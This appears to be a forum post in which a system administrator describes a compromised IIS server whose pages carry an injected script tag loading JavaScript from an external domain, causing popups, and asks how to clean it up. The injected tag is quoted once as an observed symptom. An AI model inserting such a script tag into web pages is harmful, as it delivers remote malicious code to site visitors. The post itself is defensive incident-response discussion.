We've been asked to look at an IIS server which has recently started rendering web pages with "script src = http://www.heiheinn.cn/k.js
>< / script " inserted in to the A tags. This results in people being bombarded with a series of popups when they visit the pages being displayed.
The server itself is fairly well secured, with only port 80 and 443 and 21 open to the web and is behind a VPN to which only a few people have access. There's no sign of anything in the ftp logs.
My recommendation so far is to blow the box away and restore from backups. My concern though was heightened when I searched on google for the website of the evil JS code (www.heiheinn.cn
) and found loads other links featuring that site but no pages about the problem itself. There's also the risk of restoring from backups only to find that the issue occurred before people noticed and the backups themselves are 'infected'.
The IIS box is a windows 2003 standard machine running MySQL and MS SQL 2005. Until very recently the client was doing plain dumb stuff like setting each site to the use the SA account of MS SQL with a really slack password, so I'm not entirely surprised that someone may have leveraged a way in to IIS and screwed up the links.
Anyone seen this before? I'd like to know more about it before I simply say that we burn the server at sunset, particularly if there is a risk of it coming back (which I'm assuming there is).